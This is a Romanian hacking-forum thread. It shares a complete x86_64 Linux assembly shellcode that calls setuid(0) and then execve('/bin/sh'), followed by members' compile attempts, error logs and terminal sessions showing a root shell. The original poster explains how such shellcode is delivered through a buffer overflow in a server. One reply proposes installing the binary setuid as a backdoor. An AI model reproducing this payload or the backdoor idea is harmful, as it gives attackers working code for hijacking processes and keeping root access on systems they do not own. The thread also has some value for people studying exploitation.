Nytro Posted July 21, 2013 Report Posted July 21, 2013 setuid(0) + execve("/bin/sh") on x86_64 GNU/Linux# Redistribution and use in source and binary forms, with or without# modification, are permitted provided that the following conditions are met:## * Redistributions of source code must retain the above copyright notice, this# list of conditions and the following disclaimer.# * Redistributions in binary form must reproduce the above copyright notice,# this list of conditions and the following disclaimer in the documentation# and/or other materials provided with the distribution.# * Neither the name of the Nth Dimension nor the names of its contributors may# be used to endorse or promote products derived from this software without# specific prior written permission.## THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE# POSSIBILITY OF SUCH DAMAGE.## (c) Tim Brown, 2009# <mailto:timb@nth-dimension.org.uk># <http://www.nth-dimension.org.uk/> / <http://www.machine.org.uk/>## setuid(0) + execve("/bin/sh") on x86_64 GNU/Linux.text .globl _start_start: # uid = 0 xor %edi, %edi # set %edi to 0 # setuid mov $0x69, %al # set %al to 69 (setuid) syscall # enter the kernel # *filename = "/bin//sh" xor %ax, %ax # set %ax to 0 push %ax # push %ax on to the stack movq $0x68732f2f6e69622f, %rbx # set %rbx to "hs//nib/" pushq %rbx # push %rbx on to the stack movq %rsp, %rdi # set %rdi to %esp # **argv = [0, *filename] xorq %rcx, %rcx # set %rcx to 0 pushq %rcx # push %rcx on to the stack pushq %rdi # push %rdi on to the stack movq %rsp, %rsi # set %rsi to %rsp # execve mov $0x3b, %al # set %al to 59 (execve) syscall # enter the kernelL-am postat deoarece e explicat.Sursa: http://www.nth-dimension.org.uk/pub/setuid_execve_x86_64_Linux.asm Quote
u0m3 Posted July 22, 2013 Report Posted July 22, 2013 si cum se foloseste sau compileaza? gcc setuid_execve_x86_64_Linux.asm -o shellDaca asa nu merge schimba extensia fisierului sursa din .asm in .s Quote
florinul Posted July 23, 2013 Report Posted July 23, 2013 [root@#KaNaDa-TeaM BackDoor:/root]# gcc a.s -o shel/tmp/ccuIeglI.o: In function `_start':(.text+0x0): multiple definition of `_start'/usr/lib/gcc/x86_64-redhat-linux/4.4.6/../../../../lib64/crt1.o:(.text+0x0): first defined here/usr/lib/gcc/x86_64-redhat-linux/4.4.6/../../../../lib64/crt1.o: In function `_start':(.text+0x20): undefined reference to `main'collect2: ld returned 1 exit status[root@#KaNaDa-TeaM BackDoor:/root]# gcc a.s -o shell/tmp/cchulhnB.o: In function `_start':(.text+0x0): multiple definition of `_start'/usr/lib/gcc/x86_64-redhat-linux/4.4.6/../../../../lib64/crt1.o:(.text+0x0): first defined here/usr/lib/gcc/x86_64-redhat-linux/4.4.6/../../../../lib64/crt1.o: In function `_start':(.text+0x20): undefined reference to `main'collect2: ld returned 1 exit status Quote
kNigHt Posted July 23, 2013 Report Posted July 23, 2013 (edited) Nu merge compilat orice i-as face sa moara ma-sa. A reusit cineva?EDIT: Am reusit, poate ajuta pe cineva...[root@x] ~/test2 $ wget http://www.nth-dimension.org.uk/pub/setuid_execve_x86_64_Linux.asm[ bla bla ][root@x] ~/test2 $ lssetuid_execve_x86_64_Linux.asm[root@x] ~/test2 $ mv setuid_execve_x86_64_Linux.asm setuid_execve_x86_64_Linux.s[root@x] ~/test2 $ gcc setuid_execve_x86_64_Linux.s -c -o setuid_execve_x86_64_Linux[root@x] ~/test2 $ ld setuid_execve_x86_64_Linux -o setuid_execve_x86_64_Linux_compiled[root@x] ~/test2 $ chmod +x setuid_execve_x86_64_Linux_compiled[root@x] ~/test2 $ ./setuid_execve_x86_64_Linux_compiled# whoamiroot# # # whatido/bin//sh: 4: whatido: not found# # # id uid=0(root) gid=0(root) groups=0(root)# # Edited July 23, 2013 by kNigHt Quote
Zatarra Posted July 23, 2013 Report Posted July 23, 2013 @knight - Sper ca nu l-ai executat ca root Quote
Nytro Posted July 24, 2013 Author Report Posted July 24, 2013 @knight - Sper ca nu l-ai executat ca root E in regula, l-am citit inainte de a posta, de aceea l-am postat.Sunt 2 syscall-uri:- setuid- execveCorespund cu cele de aici: >Ryan A. Chapman | Linux System Call Table for x86_64Iar acea "linie" este "hs//nib/" => /bin/sh Quote
Zatarra Posted July 24, 2013 Report Posted July 24, 2013 E in regula, l-am citit inainte de a posta, de aceea l-am postat.Sunt 2 syscall-uri:- setuid- execveCorespund cu cele de aici: >Ryan A. Chapman | Linux System Call Table for x86_64Iar acea "linie" este "hs//nib/" => /bin/shNu ma refeream la faptul ca are ceva bad in el, ma referam la faptul ca daca il executi deja ca uid 0 ce rost mai are? Quote
bcman Posted July 24, 2013 Report Posted July 24, 2013 Am facut exact acelasi lucru ca si knight si primesc urmatoarele erori la compilare:setuid_execve_x86_64_Linux.s: Assembler messages:setuid_execve_x86_64_Linux.s:42: Error: bad register name `%rbx'setuid_execve_x86_64_Linux.s:43: Error: bad register name `%rbx'setuid_execve_x86_64_Linux.s:44: Error: bad register name `%rsp'setuid_execve_x86_64_Linux.s:46: Error: bad register name `%rcx'setuid_execve_x86_64_Linux.s:47: Error: bad register name `%rcx'setuid_execve_x86_64_Linux.s:48: Error: bad register name `%rdi'setuid_execve_x86_64_Linux.s:49: Error: bad register name `%rsp'Ma gandesc ca e de la mine, daca voua v-a mers. Ceva idei? Quote
Zatarra Posted July 24, 2013 Report Posted July 24, 2013 Am facut exact acelasi lucru ca si knight si primesc urmatoarele erori la compilare:Ma gandesc ca e de la mine, daca voua v-a mers. Ceva idei?E x86_64 serverul? Dai uname -i Quote
bcman Posted July 24, 2013 Report Posted July 24, 2013 E x86_64 serverul? Dai uname -iUps, my bad. N-am fost atent, l-am testat pe un i386. Am facut proba acum si pe un x86_64 si functioneaza. Mersi!Legat de postul tau adresat lui knight, din cate vad nu l-a rulat ca root, a devenit root doar dupa executare. Quote
Zatarra Posted July 24, 2013 Report Posted July 24, 2013 Ups, my bad. N-am fost atent, l-am testat pe un i386. Am facut proba acum si pe un x86_64 si functioneaza. Mersi!Legat de postul tau adresat lui knight, din cate vad nu l-a rulat ca root, a devenit root doar dupa executare.Stiu ca $ face parte din prompt-ul unui user (!=root) dar depinde de distributie, eram doar curios Eu sincer nici acum nu l-am testat, sunt curios pe ce versiuni de kernel merge si cand a fost reparat. Quote
florinul Posted July 24, 2013 Report Posted July 24, 2013 Nytro spune-ne si noua cum se utilizeaza ca eu nu am reusit sa il compilez pe nici unu poate gresec eu pe undeva Quote
kNigHt Posted July 24, 2013 Report Posted July 24, 2013 @Zatarra N-are niciun rost sa-l executi ca root, vroiam doar sa vad daca e corect compilat In orice caz, nu mi-a mers privilege escalation cu el. Quote
florinul Posted July 26, 2013 Report Posted July 26, 2013 Knight erai deja root [root@x] ~/test2 $ ./setuid_execve_x86_64_Linux_compiled# whoamiroot Quote
shaggi Posted July 26, 2013 Report Posted July 26, 2013 shaggi@gmail:~$ gcc cacat.s -c -o cacatshaggi@gmail:~$ ./cacat-bash: ./cacat: Permission deniedshaggi@gmail:~$ chmod +x ./cacatshaggi@gmail:~$ ./cacat-bash: ./cacat: cannot execute binary fileshaggi@gmail:~$ ce cacat? Quote
Nytro Posted July 26, 2013 Author Report Posted July 26, 2013 (edited) [root@rstforums ~]# as test.asm -o object.o[root@rstforums ~]# ld object.o -o shell [root@rstforums ~]# ./shell sh-3.2# Nu e un privilege escalation exploit, e doar un shellcode care deschide un shell. 1. setuid: http://linux.die.net/man/2/setuid2. execve: /bin/sh Edited July 26, 2013 by Nytro Quote
shaggi Posted July 26, 2013 Report Posted July 26, 2013 (edited) nu-si are rostul, merge doar cand e rulat ca root...shaggi@gmail:~$ sudo ./shell# exitshaggi@gmail:~$ ./shellSegmentation faultshaggi@gmail:~$ uname -r -i2.6.32-042stab078.28 x86_64shaggi@gmail:~$ LE: e bun pe post de backdoor cu chmod 4555, adica -r-sr-xr-x Edited July 26, 2013 by shaggi Quote
Nytro Posted July 26, 2013 Author Report Posted July 26, 2013 Normal, nu e EXPLOIT, e SHELLCODE.Vedeti tutorialele facute de neox.Pe scurt:1. Ai un program/server (Apache HTTPD de exemplu) pe Linux2. Acel program are un buffer static: char buffer[100]3. Cand intri pe o pagina web: GET /pagina.php HTTP/1.1, acest rand e pus in acel buffer4. Daca pui peste 100 de caractere: GET /paginaaaaaaaaaaaaaaaaaaaaaaaaaa...aaaaaaaaaaaaaaa.php se depaseste dimensiuea acelui buffer5. Ceea ce depaseste acest buffer, in conditii optime, poate suprascrie EIP-ul (codul in executie)6. Prin exploatarea acestei probleme tu ajungi la posibilitatea de a rula cod, ca cel de mai sus, shellcode, in locul codului programului respectiv7. Codul (de mai sus), se executa, si iti ofera un shell, ca tu, om rau, sa executi comenzi releE doar ideea, foarte pe scurt.NU iti exploateaza o problema din kernel ca sa "fii root". Doar deschide un shell.Vedeti asta: setuid - Wikipedia, the free encyclopedia Quote
florinul Posted July 26, 2013 Report Posted July 26, 2013 deci pana la urma nu e local exploit nu ? Quote
Nytro Posted July 26, 2013 Author Report Posted July 26, 2013 Normal, nu e EXPLOIT, e SHELLCODE.Vedeti tutorialele facute de neox.Pe scurt:1. Ai un program/server (Apache HTTPD de exemplu) pe Linux2. Acel program are un buffer static: char buffer[100]3. Cand intri pe o pagina web: GET /pagina.php HTTP/1.1, acest rand e pus in acel buffer4. Daca pui peste 100 de caractere: GET /paginaaaaaaaaaaaaaaaaaaaaaaaaaa...aaaaaaaaaaaaaaa.php se depaseste dimensiuea acelui buffer5. Ceea ce depaseste acest buffer, in conditii optime, poate suprascrie EIP-ul (codul in executie)6. Prin exploatarea acestei probleme tu ajungi la posibilitatea de a rula cod, ca cel de mai sus, shellcode, in locul codului programului respectiv7. Codul (de mai sus), se executa, si iti ofera un shell, ca tu, om rau, sa executi comenzi releE doar ideea, foarte pe scurt.NU iti exploateaza o problema din kernel ca sa "fii root". Doar deschide un shell.Vedeti asta: setuid - Wikipedia, the free encyclopediaAm colorat. Quote
l3arn3r Posted August 19, 2013 Report Posted August 19, 2013 Nu merge compilat orice i-as face sa moara ma-sa. A reusit cineva?EDIT: Am reusit, poate ajuta pe cineva...[root@x] ~/test2 $ wget http://www.nth-dimension.org.uk/pub/setuid_execve_x86_64_Linux.asm[ bla bla ][root@x] ~/test2 $ lssetuid_execve_x86_64_Linux.asm[root@x] ~/test2 $ mv setuid_execve_x86_64_Linux.asm setuid_execve_x86_64_Linux.s[root@x] ~/test2 $ gcc setuid_execve_x86_64_Linux.s -c -o setuid_execve_x86_64_Linux[root@x] ~/test2 $ ld setuid_execve_x86_64_Linux -o setuid_execve_x86_64_Linux_compiled[root@x] ~/test2 $ chmod +x setuid_execve_x86_64_Linux_compiled[root@x] ~/test2 $ ./setuid_execve_x86_64_Linux_compiled# whoamiroot# # # whatido/bin//sh: 4: whatido: not found# # # id uid=0(root) gid=0(root) groups=0(root)# # #uname -aPlease post Result of this command Quote
